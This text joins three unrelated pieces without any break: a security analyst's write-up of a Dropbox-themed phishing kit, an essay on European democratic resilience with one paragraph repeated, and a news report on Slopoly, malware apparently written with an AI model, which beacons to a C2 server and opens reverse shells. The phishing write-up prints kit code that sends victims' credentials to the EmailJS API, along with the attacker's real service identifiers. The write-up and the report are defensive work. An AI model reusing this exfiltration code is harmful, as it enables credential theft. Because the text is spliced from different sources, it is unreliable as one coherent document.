On Wednesday, a phishing message made its way into our handler inbox that contained a fairly typical low-quality lure, but turned out to be quite interesting in the end nonetheless. That is because the accompanying credential stealing web page was dynamically constructed using React and used a legitimate e-mail service for credential collection.

But before we get to the details, let’s take a quick look at the initial message. The e-mail pretended to be a notification about a list of files shared with us through the legitimate WeTransfer service.

I mentioned that the lure used in the message was of low-quality because, as you can see in the following image, the files in question were supposedly sent by someone using our own e-mail address… Which would probably be at least a little suspicious to any recipient.

The body of the message included a list of files that were supposedly part of the transfer – in total the message claimed that 76 items with a combined size of 1010 MB were shared with us (or with the intended victim, to be more general).

Messages of this type are quite ubiquitous and the only reason why I decided to spend any time on this one was the link it contained. It pointed to the following URL:

hxxps[:]//crimson-pine-6e12[.]gstmfhxzvbxk[.]workers[.]dev/?%D0%BF%D1%80%D0%BE86%D0%B3%D1%80%D0%[email protected]()Dropbox%20Community

Embedding the recipient’s e-mail address in the query string is something we see fairly frequently in phishing campaigns, but the ending of the parameter string with “()Dropbox Community” caught my attention.

Another small detail that somewhat stood out was the encoded portion at the beginning of the query parameter, which used percent-encoded UTF-8 byte sequences that did not correspond to standard ASCII characters.

%D0%BF%D1%80%D0%BE86%D0%B3%D1%80%D0%B0

When decoded, the first characters correspond to Cyrillic letters, specifically:

This appears to be a truncated fragment of the Russian word for a program:

The reason for including this fragment is unclear, but it provides an indicator of the language the authors of the phishing might have spoken (since one wouldn’t expect any false-flag attempts in a generic phishing campaign such as this one).

As you may have noted, the link used in the message pointed to a Cloudflare Workers domain (workers.dev), which, apart from its legitimate use, has become a convenient hosting platform for short-lived malicious infrastructure in recent years[1,2].

The link led to a fake Dropbox Transfer page showing what appeared to be a file download portal with a list of documents displayed over a looping video.

Selecting any of the download options resulted in a login prompt requesting the user’s e-mail address and password before access to the files would (supposedly) be granted.

While the user interface itself was fairly typical for a phishing page, its structure was somewhat more interesting.

Inspecting the page source revealed that the HTML document was almost empty and consisted mainly of a single placeholder element together with a reference to a JavaScript bundle main.90eaa1b0.js (the additional hidden elements were unrelated to the visible interface and were likely artifacts of the phishing kit or simple attempts to evade automated scanning).

...

This indicated that the page was implemented as a single-page web application, where the interface was supposed to be rendered dynamically in the browser. This approach is much less common in phishing kits than static HTML pages and can somewhat complicate analysis if an analyst relies only on a landing page source code.

Opening the referenced JavaScript bundle confirmed the hypothesis and showed that the page was built using React[3], since it contained the React runtime together with the application code. Typical runtime identifiers appeared throughout the file, as you can see in the following image.

The entire phishing interface was therefore rendered dynamically once the JavaScript bundle executed and attached itself to the root HTML element.

The most interesting portion of the code appeared in the logic responsible for submitting the login form. The bundle contained a call to the EmailJS service[4], which allows web applications to send e-mails via its API directly from client-side JavaScript.

The three following code fragments show the relevant functionality:

1. Code responsible for sending a POST request to the EmailJS API

   const D={origin:"https://api.emailjs.com", ...}
   
   H=async function(e,t){
     ...
     const r=await fetch(D.origin+e,{method:"POST",headers:n,body:t}),
     ...
   }

   
   

    

2. Definition of a routine that builds the POST request body

   X=async(e,t,n,r)=>{
     const l=F(r),
           a=l.publicKey||D.publicKey,
           ...
     ...
     f.append("lib_version","4.4.1"),
     f.append("service_id",e),
     f.append("template_id",t),
     f.append("user_id",a),
     H("/api/v1.0/email/send-form",f)
   }

   
   

    

3. Code that supplies parameters for the POST request (strings inside this excerpt are EmailJS inputs – “service_t8yu1k1” is a service ID, “template_vszijae” is a template ID and the constant “e” contains a public API key)

   const e="Z2Y07-t9AET4hviRq";
   if(
     X("service_t8yu1k1","template_vszijae",r.current,{publicKey:e}).then((()=>{console.log("a")}),(e=>{console.log("e")})),
     ...
   )

   
   

    

Using this code, any credentials entered by a victim would be collected and transmitted through the EmailJS API.

It should further be mentioned that the JS code also queried the Geoapify IP information API[5] to gather geographic metadata about the victim, which was then intended to be sent to the attackers along with the harvested credentials.

After the form submission the page would redirect the victim to the legitimate website (Dropbox), as is usual in similar circumstances.

Although the entire campaign is basically just a run-of-the-mill credential harvesting operation, from a technical standpoint, the phishing kit used is quite interesting. Both because the implementation through a React application bundled into a single JavaScript file can potentially be effective in evading simple security filters on web proxies that rely only on static HTML analysis, but also due to use of a legitimate third-party service for credential exfiltration instead of an attacker-controlled infrastructure.

IoCs

Phishing domain:

crimson-pine-6e12.gstmfhxzvbxk.workers.dev

EmailJS identifiers:

service_t8yu1k1

template_vszijae

[1] https://developers.cloudflare.com/workers/

[2] https://www.fortra.com/blog/cloudflare-pages-workers-domains-increasingly-abused-for-phishing

[3] https://react.dev/

[4] https://www.emailjs.com/docs/

[5] https://www.geoapify.com/ip-geolocation-api/

-----------

Jan Kopriva

LinkedIn

Nettles Consulting

European democracy is being battered by multiple storms. Far-right parties are surging across the continent, authoritarian powers are menacing the democratic information space, and mainstream governments seem incapable of quelling popular frustration. And the European Union must now also contend with the perplexing oddity of a U.S. administration that is painting its democratic governments as the main global threat to democracy. The United States’ 2025 National Security Strategy unnervingly defended the illiberal parties that most clearly menace democracy, and going into 2026, the Trump administration has become even more unchained in its voracious provocations against Europe’s liberal order.

This roiling sea of troubles has sparked intense political debate about what is needed to make European democracy more resilient. Even if overall levels of democracy in Europe have not worsened significantly over the last decade (Hungary being the one case of clear autocratization), the prospect of a more dramatic democratic collapse in the future is real.

This roiling sea of troubles has sparked intense political debate about what is needed to make European democracy more resilient. Even if overall levels of democracy in Europe have not worsened significantly over the last decade (Hungary being the one case of clear autocratization), the prospect of a more dramatic democratic collapse in the future is real.

As problems pile up, the EU and individual governments have begun to explore policies to shore up the continent’s increasingly precarious democratic norms and institutions. The European Centre for Democratic Resilience was launched in February, and most European governments have introduced national strategies to defend democracy, as well.

These policy responses have been slow to take shape over the last decade but are now gaining momentum and coming to dominate EU policy agendas. However, emerging European strategies misunderstand what is needed for effective democratic resilience, and their impact is likely to be harmful in many important ways. Europe’s democratic defense policies must not only counter threats coming from autocratic powers and radical right movements, but they must also work to reform and upgrade how democracy itself functions.

---

However, democratic resilience strategies need to focus on other problems to at least the same intensity. European democracy cannot be comprehensively defended through formal standards and exchanges on best practices for online election standards or internet laws—which is what passes for most democracy strategy at present.

Neither can it be improved simply by asserting tough European autonomy from the United States and other powers, however necessary it might be for other reasons. Due to the geopolitical context, much debate has atrophied into calls for European autonomy. But this line does not help in determining how Europe should use such independence to revive its democracy.

That’s because efforts to control specific types of information manipulation address the symptoms rather than the underlying distortions of information ecosystems. Online controls are necessary, but they cannot tackle the root causes of why certain information flows carry disproportionate and unaccountable power and why citizens are so susceptible to such distorted accounts. If malign online influences have gained traction, then that is a result of democratic corrosion as much as the cause—the very opposite of the logic that is hardwired into current European approaches.

The EU’s regulatory-oriented pathway amounts to what might be termed “resilience without politics.” It needs to give way to a much more political approach to democratic resistance. Current European approaches downplay the essentially political issues that need addressing if democracy is to work better for all citizens. Properly understood, democratic resilience is not a matter of simply rebuffing threats—whether from Russia, China, or the United States—but about improving democratic practices through qualitative political renewal.

Much of Europe’s democratic malaise is endogenous to democracy, not external.

At root, European democracies are so brittle because of their governments’ own nefarious dysfunctionalities and the structural power imbalances that sustain them. On this score, the EU has registered little progress and even exhibits a certain resistance to contemplating the ambitious change that is needed.

Many emerging policies center on mitigating polarization as the main dynamic that has corroded European democracy. Leaders’ speeches tend to suggest that saving democracy is a matter of rebuilding consensus and “the center holding.” Yet, again, this kind of bromide unduly depoliticizes democratic resilience. While the anti-democratic impact of extremist parties clearly needs to be contained, democracy protection cannot be reduced to consensual centrism. If anything, it requires more open and critical politics.

Polarization germinates in political systems’ failure to prevent a wide enough range of policy options that are fully responsive to citizens’ concerns. This was clear during the eurozone crisis when rival parties offered relatively similar economic templates and new governments often assumed power with negligible change to substantive policies.

Effective democratic resilience ultimately requires a revived spirit of contestation and pluralism. And this needs to be facilitated and supported through very specific and tailored political measures.

As much of the threat to European democracy comes from challenger political parties, EU resilience strategies need to help revive and reshape party systems. However, virtually no European effort or funding goes to this issue. Resilience is a not just a matter of containing radical right parties but of more deeply changing the way that parties interact with citizens and the way that they decide their manifestos and crafting less hierarchical forms of party organization. The same is true of parliaments: They have lost leverage in most European states, but EU policy offers little to redress this trend.

Democracy strategies also need to be aware of the ways in which societies are mobilizing to protest against illiberal regimes and threats. But the EU has refrained from offering unequivocal support to protests in member states like Hungary, Bulgaria, Greece, and Slovakia or in candidate states like Serbia and Georgia. Indeed, the EU has generally been ambivalent over these revolts and tends to call blandly for even-handed restraint from regimes and protestors in such cases.

This leaves a curious disjuncture. The EU rightly bears down on Russian and Chinese FIMI operations—and indeed those increasingly coming from U.S. illiberal networks—that are designed to turn people against democracy. But when there is ample evidence on the streets that European citizens do believe in democracy and are acting in its name, they get little support from the EU itself. Indeed, national governments have even sought to curtail such popular mobilization in the last several years. This betrays European governments’ tendency to conceive democracy in technocratic terms—as a system to be carefully guided and managed—and to downplay the catalytic role of citizen-led, pluralistic contestation.

The European level of politics also needs to be considered: A pressing source of citizens’ disenfranchisement comes from the transfer of powers from the national to the EU level without commensurate democratic accountability. This structural feature of European integration is as much of a challenge as Russian or MAGA online manipulation. This does not mean slowing or undoing EU integration—indeed, deeper cooperation between governments is clearly essential to defending democracy, and Europeans need to push back more firmly against the Trump administration’s declared hostility to the EU’s very existence. But democratic resilience does require the European project to democratize itself.

The current European framing of democratic resilience almost willfully ignores this factor. The EU and its member states talk ritually about the need to engage citizens but do relatively little to follow through on this. The European Commission and some member states now run citizen panels and assemblies, but the need goes well beyond these valuable initiatives and requires a sweeping effort at more inclusive democracy across many levels and actors. Citizens, community groups, and the many civic organizations working on democratic renewal need tangible influence over policies through processes institutionalized in formal EU decision-making, which is well beyond the cosmetic and heavily curated civil society forums that currently exist. The EU should more wholeheartedly back innovative means of transnational citizen engagement—like pan-European democracy movements and assemblies—that differ from the nation-state template of representative democracy.

An emerging position in EU debates is that liberals need to “fight fire with fire” through hardball tactics against illiberal forces—and especially those driven by U.S.-led MAGA networks. That is, they need to move from defense to offense. Examples include emerging legal actions in several European states, particularly Germany and France, against far-right parties and politicians. Across Europe, there are growing calls for liberal lawfare against illiberal lawfare, tactics to weaken illiberal groups in the same way that illiberal regimes now restrict liberal civil society, and other such confrontational moves.

The EU must strike a balance here. While democratic resilience strategies certainly need to be more assertive against the radical right, they should be cautious in using laws and institutional processes to engineer highly instrumental outcomes. European liberals must not conflate defending democracy with defending their own position against illiberal challengers. Even if the Trump administration’s charges against Europe’s supposedly undemocratic liberalism and free speech restrictions are clearly disingenuous, European democracy strategies do need to speak much more directly to this thorny question. Policies need to clearly define red lines that should not be crossed in the use of illiberal means to defend liberal politics. Democracy’s long-term prospects will suffer if many feel that legal actions against illiberals infringe on due process or that civil society funding rules are biased.

---

Combined, this all points to the need for a full-spectrum democratic resilience that can turn the tide against the radical right’s disquieting political illiberalism. For now, European attempts at democratic resilience are planted in shallow soil. The shock of U.S. President Donald Trump’s illiberal onslaught catalyzed some modest new EU democracy commitments in 2025, within and beyond Europe. However, much stronger political commitment, boldness, and innovation will be needed if these are to grow into a sturdier approach to defending and deepening European democracy. And this is not a parochial matter: Europe’s experience in democratic resilience will inform and condition efforts in other regions to push back against this era’s illiberal tide.

Ravie LakshmananMar 12, 2026Artificial Intelligence / Malware

Cybersecurity researchers have disclosed details of a suspected artificial intelligence (AI)-generated malware codenamed Slopoly put to use by a financially motivated threat actor named Hive0163.

“Although still relatively unspectacular, AI-generated malware such as Slopoly shows how easily threat actors can weaponize AI to develop new malware frameworks in a fraction of the time it used to take,” IBM X-Force researcher Golo Mühr said in a report shared with The Hacker News.

Hive0163’s operations are driven by extortion through large-scale data exfiltration and ransomware. The e-crime group is primarily associated with a wide range of malicious tools, including NodeSnake, Interlock RAT, JunkFiction loader, and Interlock ransomware.

In one ransomware attack observed by the company in early 2026, the threat actor was observed deploying Slopoly during the post-exploitation phase so as to maintain persistent access to the compromised server for more than a week.

Slopoly’s discovery can be traced back to a PowerShell script that’s likely deployed by means of a builder, which also established persistence via a scheduled task called “Runtime Broker.”

There are signs that the malware was developed with the help of an as-yet-undetermined large language model (LLM). This includes the presence of extensive comments, logging, error handling, and accurately named variables. The comments also describe the script as a “Polymorphic C2 Persistence Client,” indicating that it’s part of a command-and-control (C2) framework.

“However, the script does not possess any advanced techniques and can hardly be considered polymorphic, since it’s unable to modify its own code during execution,” Mühr noted. “The builder may, however, generate new clients with different randomized configuration values and function names, which is standard practice among malware builders.”

The PowerShell script functions as a full-fledged backdoor that can beacon a heartbeat message containing system information to a C2 server every 30 seconds, poll for a new command every 50 seconds, execute it via “cmd.exe,” and relay the results back to the server. The exact nature of the commands run on the compromised network is currently unknown.

The attack in itself is said to have leveraged the ClickFix social engineering tactic to trick a victim into running a PowerShell command, which then downloads NodeSnake, a known malware attributed to Hive0163. A first-stage component, NodeSnake, is designed to run shell commands, establish persistence, and retrieve and launch a wider malware framework referred to as Interlock RAT.

Hive0163 has a track record of employing ClickFix and malvertising for initial access. Another method the threat actor uses to establish a foothold is by relying on initial access brokers such as TA569 (aka SocGholish) and TAG-124 (aka KongTuke and LandUpdate808). 

The framework has multiple implementations in PowerShell, PHP, C/C++, Java, and JavaScript to support both Windows and Linux. Like NodeSnake, it also communicates with a remote server to fetch commands that allow it to launch a SOCKS5 proxy tunnel, spawn a reverse shell on the infected machine, and deliver more payloads, such as Interlock ransomware and Slopoly.

The emergence of Slopoly adds to a growing list of AI-assisted malware, which also includes VoidLink and PromptSpy, highlighting how bad actors are using the technology to accelerate malware development and scale their operations.

“The introduction of AI-generated malware does not pose a new or sophisticated threat from a technical standpoint,” IBM X-Force said. “It disproportionately enables threat actors by reducing the time an operator needs to develop and execute an attack.”